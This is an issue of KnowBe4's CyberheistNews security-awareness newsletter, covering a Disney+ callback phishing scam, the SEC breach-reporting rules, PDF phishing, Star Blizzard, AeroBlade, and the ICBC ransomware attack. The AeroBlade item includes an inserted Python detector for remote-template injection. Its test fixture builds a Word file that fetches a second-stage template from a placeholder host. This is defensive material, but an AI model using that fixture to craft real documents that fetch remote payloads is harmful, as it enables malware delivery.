CyberheistNews Vol 13 #50 [Heads Up] Don't Be Fooled by This Sneaky Disney+ Phishing Scam


CyberheistNews Vol 13 #50  |   December 12th, 2023

[Heads Up] Don't Be Fooled by This Sneaky Disney+ Phishing Scam

Stu Sjouwerman SACP

A callback phishing campaign is impersonating Disney+ with phony invoices, according to researchers at Abnormal Security. The phishing emails targeted individuals at 22 organizations.

"The first step in this multi-stage attack is a seemingly auto-generated notification email informing the target of a pending charge for their new Disney+ subscription," the researchers explain.

"The message states that, per the contract signed during the initial registration process, the recipient will be automatically billed on the same day the notification was sent. The email continues by explaining that if the payment is authorized, no further steps are required. However, if the recipient did not approve this transaction, they can contact the support team."

The phony invoice contains the recipient's real name, as well as a phone number for the recipient to call if they want to cancel the subscription.

"Should the recipient call the number, one of two things is likely to happen," the researchers write. "The first is they will be asked to provide sensitive information, such as banking details or login credentials, that the attacker can then use to either complete fraudulent transactions or compromise accounts.

"The other possibility is they will be given instructions for downloading software they are told is necessary to assist with stopping the charge but will actually infect their computer with malware." Notably, the email says they'll be charged $49.99 if they don't dispute the subscription (a real Disney+ subscription costs $13.00 per month).

"By telling the target they are hours away from being charged for an amount that is 3.5x the highest-cost subscription, the attacker increases the likelihood that the recipient will be quick to call the provided number to stop the transaction," the researchers write.

KnowBe4 enables your workforce to make smarter security decisions every day. Over 65,000 organizations worldwide trust the KnowBe4 platform to strengthen their security culture and reduce human risk.

Blog post with links:

Combatting Rogue URL Tricks: Quickly Identify and Investigate the Latest Phishing Attacks

Everyone knows you shouldn't click phishy links. But are your end users prepared to quickly identify the trickiest tactics bad actors use before it's too late? Probably not.

Cybercriminals have moved beyond simple bait and switch domains. They're now employing a variety of advanced social engineering techniques, like sneaky rogue URLs, to entice your users into clicking and putting your network at risk.

Join Roger A. Grimes, KnowBe4's Data-Driven Defense Evangelist, for this webinar as he shows you how to become an expert phish finder. He'll dive deep into the latest techniques and defenses to share:

  • Real-life examples of advanced attacks using rogue digital certificates, homograph attacks and more
  • Safe forensic methods for examining URLs and other tactics for investigating phishy emails
  • Strategies for dissecting URLs on mobile without clicking
  • Simple ways you can train your users to scrutinize URLs and keep your network safe
  • Find out what you need to know to keep your network protected and safe from the latest phishing attacks!

Date/Time: TOMORROW, Wednesday, December 13, @ 2:00 PM (ET)

Can't attend live? No worries — register now and you will receive a link to view the presentation on-demand afterwards.

Save My Spot!

[1 Min Video] New SEC Rules Will Do More Than Result in Quick Breach Reporting

On July 26, the U.S. Securities and Exchange Commission (SEC) announced several new cybersecurity rules, taking effect mid-December 2023, that will significantly impact all U.S. organizations (and foreign entities doing business in the U.S.) that must follow SEC regulations.

Although the announcement did not generate much fanfare outside the usual business and cybersecurity sites, the rules will greatly increase resource requirements and the actions firms must take. Some cybersecurity firms are already seeing a significant uptick in new business, and those that are paying attention to the new requirements can expect to see a lot of new business opportunities.

What Are the New SEC Rules?

The rule getting the most coverage is the one requiring regulated firms to report significant cyber breaches to the SEC and the public within four days. Per the SEC's official announcement:

"The new rules will require registrants to disclose on the new Item 1.05 of Form 8-K any cybersecurity incident they determine to be material and to describe the material aspects of the incident's nature, scope, and timing, as well as its material impact or reasonably likely material impact on the registrant. An Item 1.05 Form 8-K will generally be due four business days after a registrant determines that a cybersecurity incident is material."

The "materiality" part is important in understanding the new reporting requirement. Materiality is a generally accepted accounting standard that says an event only needs to be reported to stakeholders (i.e., customers, stockholders, regulators, etc.) if omitting it would have had an impact on a decision being made by a reader of that disclosure or of a financial statement. Here are two good summary statements on materiality:

  • Accounting Tools: Materiality principle definition
  • Wall Street Mojo: Materiality Concept

What is or is not considered "material" can change depending on the stakeholders and event. Officially, accounting professionals (e.g., CPAs, etc.) are told there is no particular amount or percentage that makes an event material or not material. When in doubt, follow the standard of "would it matter to a reader of a financial statement."

But in practice, the SEC says the amount involved can be as little as 0.5% - 5% of total assets. It can also be lower or higher. It depends on the event.

KnowBe4 experts explain the latest SEC ruling in one minute. Watch the video:

Blog post with links:

[NEW FEATURE] PhishER Plus and CrowdStrike Falcon Sandbox Integration

Now there's a new, super easy way to protect your users against malicious emails through the power of KnowBe4's PhishER Plus!

PhishER Plus gives you extremely effective capabilities:

Global PhishRIP, a cutting-edge email quarantine feature that automatically removes malicious email before your user is exposed to the threat, and Global Blocklist, an active global threat feed from over 10 million trained users for Microsoft 365.

These are real-world phishing threats, triple-vetted by humans and AI-validated. The result? Your Microsoft 365 email filters get a significant boost, all from within your PhishER console.

With the PhishER Plus and CrowdStrike Falcon Sandbox integration you can streamline your workflow to further analyze user-reported malicious emails without risking your organization's environment.

Join us for a live 30-minute demo of the Plus features of PhishER, the #1 Leader in the G2 Grid Report for SOAR Software.

With PhishER Plus you can:

  • New! Use crowdsourced intelligence from more than 10 million users to block known threats before you're even aware of them
  • New! Automatically isolate and "rip" malicious emails from your users' inboxes that have bypassed mail filters
  • New! Simplify your workflow by analyzing links and attachments with the CrowdStrike Falcon Sandbox integration from a single console
  • New! Leverage the expertise of the KnowBe4 Threat Research Lab to analyze tens of thousands of malicious emails reported by users around the globe per day
  • Automate message prioritization by rules you set and cut through your Incident Response inbox noise to respond to the most dangerous threats quickly

Find out how adding PhishER Plus can be a huge time-saver for your incident response team while ensuring your users are safe!

Date/Time: Wednesday, December 20, @ 2:00 PM (ET)

Save My Spot:

PDFs: Friend or Phishing Foe? Don't Get Caught by the Latest Scam Tactic

Researchers at McAfee warn that attackers are increasingly using PDF attachments in email phishing campaigns. "Over the last four months, McAfee Labs has observed a rising trend in the utilization of PDF documents for conducting a succession of phishing campaigns," the researchers write.

"These PDFs were delivered as email attachments. Attackers favor using PDFs for phishing due to the file format's widespread trustworthiness."

"PDFs, commonly seen as legitimate documents, provide a versatile platform for embedding malicious links, content, or exploits. By leveraging social engineering and exploiting the familiarity users have with PDF attachments, attackers increase the likelihood of successful phishing campaigns.

"Additionally, PDFs offer a means to bypass email filters that may focus on detecting threats in other file formats." Scammers are crafting PDFs that impersonate popular brands in order to deliver malware or trick victims into handing over sensitive information.

"Attackers employ a range of corporate themes in their social engineering tactics to entice victims into clicking on phishing links," McAfee says. "Notable brands such as Amazon, Apple, Netflix, and PayPal, among others, are often mimicked.

"The PDFs are carefully crafted to induce a sense of urgency in the victim's mind, utilizing phrases like 'your account needs to be updated' or 'your ID has expired.' These tactics aim to manipulate individuals into taking prompt action, contributing to the success of the phishing campaigns."

The researchers offer the following advice to help users avoid falling for phishing attacks:

  • "Be Skeptical: Exercise caution when receiving unsolicited emails, messages, or social media requests, especially those with urgent or alarming content."
  • "Verify Sender Identity: Before clicking on any links or providing information, verify the legitimacy of the sender. Check email addresses, domain names, and contact details for any inconsistencies."
  • "Avoid Clicking on Suspicious Links: Hover over links to preview the actual URL before clicking. Be wary of shortened URLs, and if in doubt, verify the link's authenticity directly with the sender or through official channels."
  • "Use Two-Factor Authentication (2FA): Enable 2FA whenever possible. This adds an extra layer of security by requiring a second form of verification, such as a code sent to your mobile device."

Blog post with links:

How Vulnerable is Your Network Against Ransomware and Cryptomining Attacks?

Bad actors are constantly coming out with new versions of ransomware strains to evade detection. Is your network effective in blocking ransomware when employees fall for social engineering attacks?

KnowBe4's Ransomware Simulator "RanSim" gives you a quick look at the effectiveness of your existing network protection. RanSim will simulate 24 ransomware infection scenarios and 1 cryptomining infection scenario to show you if a workstation is vulnerable.

Here's how RanSim works:

  • 100% harmless simulation of real ransomware and cryptomining infections
  • Does not use any of your own files
  • Tests 25 types of infection scenarios
  • Just download the installer and run it

Results in a few minutes!

This is complimentary and will take you five minutes max. RanSim may give you some insights about your endpoint security you never expected!

Get RanSim Now!

Insidious Russian FSB Spear Phishing Campaign Targets Personal Email Addresses

A name that has recently garnered significant attention is Star Blizzard, a spear phishing operation linked to the Russian Federal Security Service (FSB).

According to a joint advisory by the Five Eyes intelligence alliance, Star Blizzard has been actively targeting personal email addresses since 2019. This preference for personal over organizational or corporate addresses suggests a strategy to exploit weaker security controls.

The modus operandi of Star Blizzard is particularly insidious. The campaign begins with emails that are seemingly benign, tailored to the recipient's interests to build trust and rapport. It's only after establishing a connection with the target that Star Blizzard escalates its tactics, sharing links that lead to FSB-controlled servers.

These servers display pages mimicking legitimate services, luring victims into entering their account credentials, which are then compromised.

The impact of this spear phishing campaign is not just limited to the initial target. Once Star Blizzard gains access to an individual's email and contacts list, it uses this information to launch further attacks, expanding its web of deception and manipulation.

This approach mirrors techniques traditionally used by intelligence services in agent recruitment, but adapted for the digital realm.

The primary focus of Star Blizzard has been on the UK and the U.S., with additional attention paid to other NATO countries and regions in Russia's sphere of influence. The targets? Academia, defense, governmental organizations, NGOs, think tanks, and politicians. The Wall Street Journal notes that the public identification of the FSB's involvement is aimed at hindering their ability to sway elections in Western democracies.

Despite dismissals by the Russian embassy in London, the operation's objectives are significant. Reports indicate that Star Blizzard is not just engaged in intelligence gathering but also aims to disrupt investigations into Russian war crimes in Ukraine.

As cybersecurity threats become more sophisticated and targeted, understanding the tactics and motivations of groups like Star Blizzard is crucial.

[Budget Ammo] Need KnowBe4 Customer Reviews From Your Own Industry?

We're happy to publish a new page with links to hundreds of validated customer reviews at the G2 site where you can now find dozens organized by industry. This is super handy when you need to submit budget approval and purchasing requires legit industry references.

Go here and have a quick look at reviews from your peers:

Let's stay safe out there.

Warm Regards,

Stu Sjouwerman, SACP
Founder and CEO
KnowBe4, Inc.

PS: Check out the new multimodal AI model from Google called Gemini. Edited, but still impressive:

PPS: Yours Truly in FastCompany - AI: Cybersecurity threat or opportunity?:

Quotes of the Week  
"Three rules for a career: 1) Don't sell anything you wouldn't buy yourself; 2) Don't work for anyone you don't respect and admire; and 3) Work only with people you enjoy."
- Charlie Munger (January 1, 1924 – November 28, 2023)

"This is a good life lesson: getting the right people into your system is the most important thing you can do."
- Charlie Munger (January 1, 1924 – November 28, 2023)

Thanks for reading CyberheistNews

You can read CyberheistNews online at our Blog

Security News

AeroBlade's Commercial Cyber Espionage

Researchers at BlackBerry are tracking a previously unobserved threat actor dubbed "AeroBlade" that's launching phishing attacks against organizations in the U.S. aerospace industry. The threat actor is sending malicious documents to trick employees into installing malware.

"When opened, the document displays text in a deliberately scrambled font, along with a 'lure' message asking the potential victim to click it to enable the content in MS Office," the researchers write. "The docx document employs remote template injection…to download the second stage of the infection.

"The next-stage information is saved in an XML (eXtensible Markup Language) file inside a .dotm file... Once the victim opens the file and executes it by manually clicking the 'Enable Content' lure message, the [redacted].dotm document discreetly drops a new file to the system, and opens it.

"The newly downloaded document is readable, leading the victim to believe that the file initially received by email is legitimate. In fact, it's a classic cyber bait-and-switch, performed invisibly right under the victim's nose."
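The remote template injection the researchers describe works because a .docx is a ZIP package in which Word records an attached template in word/settings.xml and resolves it through a relationship in word/_rels/settings.xml.rels; when that relationship is marked External and points at a web or UNC location, Word fetches the template (here, the .dotm second stage) at open time. The following check, added here as an example and not code from BlackBerry, KnowBe4 or the AeroBlade write-up, scans every relationship part of a Word file for an external attachedTemplate and reports its target, which is the artifact a mail gateway or triage script can flag before a user ever sees the "Enable Content" lure. The helper that builds a minimal document in memory exists only so the check can be exercised offline; its template address uses the reserved example.invalid domain and is a constructed placeholder.

```python
"""Flag remote-template (attachedTemplate) injection in OOXML Word files.

Added example, not code from the AeroBlade report or any vendor. Relies only
on the Python standard library and the public OOXML relationship vocabulary.
"""
import io
import re
import xml.etree.ElementTree as ET
import zipfile
from typing import List, Optional

REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
ATTACHED_TEMPLATE = ("http://schemas.openxmlformats.org/officeDocument/2006/"
                     "relationships/attachedTemplate")
WORD_NS = "http://schemas.openxmlformats.org/wordprocessingml/2006/main"
# Targets Word would fetch over the network: http(s) URLs or UNC paths.
REMOTE_TARGET = re.compile(r"^(https?://|\\\\)", re.IGNORECASE)


def find_remote_templates(docx_bytes: bytes) -> List[str]:
    """Return "part: target" strings for every external attachedTemplate.

    An empty list means the package declares no remote template. Callers
    should treat zipfile.BadZipFile (not a valid OOXML package) separately.
    """
    hits: List[str] = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        # Inspect every .rels part rather than only settings.xml.rels, so a
        # template relationship declared from another part is not missed.
        for name in zf.namelist():
            if not name.endswith(".rels"):
                continue
            try:
                root = ET.fromstring(zf.read(name))
            except ET.ParseError:
                continue  # malformed relationship part: nothing to resolve
            for rel in root.iter(f"{{{REL_NS}}}Relationship"):
                if rel.get("Type") != ATTACHED_TEMPLATE:
                    continue
                target = rel.get("Target", "")
                if rel.get("TargetMode") == "External" and REMOTE_TARGET.match(target):
                    hits.append(f"{name}: {target}")
    return hits


def build_sample_docx(template_target: Optional[str]) -> bytes:
    """Build a minimal constructed .docx in memory to exercise the check.

    With template_target=None the package has no attached template (benign
    case); otherwise it declares an External attachedTemplate relationship.
    This is a test fixture only: the body text is a single paragraph and the
    target is whatever placeholder the caller passes in.
    """
    rels = [f'<Relationships xmlns="{REL_NS}">']
    attached = ""
    if template_target is not None:
        rels.append(f'<Relationship Id="rId1" Type="{ATTACHED_TEMPLATE}" '
                    f'Target="{template_target}" TargetMode="External"/>')
        attached = '<w:attachedTemplate r:id="rId1"/>'
    rels.append("</Relationships>")
    settings = (f'<w:settings xmlns:w="{WORD_NS}" xmlns:r="http://schemas.'
                f'openxmlformats.org/officeDocument/2006/relationships">'
                f"{attached}</w:settings>")
    document = (f'<w:document xmlns:w="{WORD_NS}"><w:body><w:p><w:r>'
                "<w:t>constructed sample</w:t></w:r></w:p></w:body></w:document>")
    content_types = ('<Types xmlns="http://schemas.openxmlformats.org/package/'
                     '2006/content-types"><Default Extension="xml" '
                     'ContentType="application/xml"/></Types>')
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml", content_types)
        zf.writestr("word/document.xml", document)
        zf.writestr("word/settings.xml", settings)
        zf.writestr("word/_rels/settings.xml.rels", "".join(rels))
    return buf.getvalue()


if __name__ == "__main__":
    # Placeholder address on the reserved example.invalid domain.
    suspicious = build_sample_docx("http://template.example.invalid/stage2.dotm")
    benign = build_sample_docx(None)
    print("suspicious:", find_remote_templates(suspicious))
    print("benign:    ", find_remote_templates(benign))
```

The check deliberately reports the target rather than deciding on its own whether a given host is hostile: legitimate organizations do use remote templates on internal file shares, so the useful triage rule is usually "external template AND target not on an allow-list of corporate template servers", and the returned string gives a SOC analyst the value to compare.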

The researchers don't know who AeroBlade is working for, but they believe the threat actor is conducting commercial cyberespionage.

"Given the relatively sophisticated technical capabilities this threat actor deployed and the victim's timelines, we conclude with a high degree of confidence that this was a commercial cyberespionage campaign," BlackBerry says. "Its purpose was most likely to gain visibility over the internal resources of its target in order to weigh its susceptibility to a future ransom demand."

The researchers add, "Based on the threat actor's operations timelines we can surmise that this shows the group's interest in the target remained consistent between the first and second campaign, as evidenced by the increased complexity of the second campaign compared to the first.

"During the time that elapsed between the two campaigns we observed, the threat actor put considerable effort into developing additional resources to ensure they could secure access to the sought-after information, and that they could exfiltrate it successfully."


BlackBerry has the story:

New York Unit of World's Largest Bank Becomes Ransomware Victim

The ransomware attack on ICBC Financial Services caused disruption of trading of U.S. Treasuries and marked a new level of breach that could have massive repercussions.

When we saw the attack on the Colonial Pipeline back in 2021, the impact was felt throughout the Southeast United States. Any attack on key businesses that keeps an economy running will have some form of impact should the attack be successful.

And that's exactly what happened to the Industrial and Commercial Bank of China's New York unit, which is responsible for ensuring that brokers' trades and transactions in U.S. Treasuries go through.

While not much is known about the specifics of the attack, according to the Wall Street Journal, ICBC had to disconnect affected systems and was unplugged from the Treasury. Any trades placed had to be manually cleared.

This kind of attack signals that despite banks feeling like they may be impenetrable due to concerted cybersecurity efforts, they can still become a victim. The implications are that it's possible for entire markets to come to a halt from a single cyber attack.

According to recent industry data, the financial services market saw a 121% increase in phishing attacks in Q3 of this year. This indicates a massive focus on this industry by bad actors. While security solutions will stop a material amount of attacks, many phishing attacks still make their way to your users' inbox.

This will require your users to become part of your organization's security stance – something taught through new-school security awareness training.

Blog post with links:

What KnowBe4 Customers Say

"Christian M. has been such a pleasure to work with and is the most amazing Customer Success Manager we have ever had. Please take care of him as he is a great employee. Thank you and have a great day."

- S.G., Information Systems Security Specialist

"Dear Mr. Sjouwerman, I am writing to express my sincere appreciation for your incredible team of employees at KnowBe4! Specifically, I would like to recognize Nichol W. for the outstanding customer service she provides to our Credit Union. Nichol is very knowledgeable and genuinely interested in making sure customers take full advantage of all included benefits. We are very grateful to have Nichol as our Customer Success Manager, as she has made navigating the KnowBe4 platform and campaigns effortless. Please do not let her efforts go unnoticed.

Thank you for hiring such a great team of individuals that make your customers feel respected and valued."

- R.J., VP of Information Systems

The 10 Interesting News Items This Week
  1. CISA summary report on Russian APT and how they use long-term social engineering to achieve their goals:

  2. U.S. charges two Russians in hacks of government accounts:

  3. Kremlin-backed hackers attacking unpatched Outlook systems, Microsoft says:

  4. New AeroBlade hackers target aerospace sector in the U.S.:

  5. Due to AI, "We are about to enter the era of mass spying," says Bruce Schneier:

  6. Police Arrest 1000 Suspected Money Mules:

  7. UK wants to block all Social Media Scams:

  8. Disruptive new wave of ransomware hits critical infrastructure:

  9. OCR Imposes First HIPAA Penalty for a Phishing Attack:

  10. U.S. and U.K. Accuse Russia of Global Hacking Spree Targeting British Elections:

Cyberheist 'Fave' Links
This Week's Links We Like, Tips, Hints and Fun Stuff
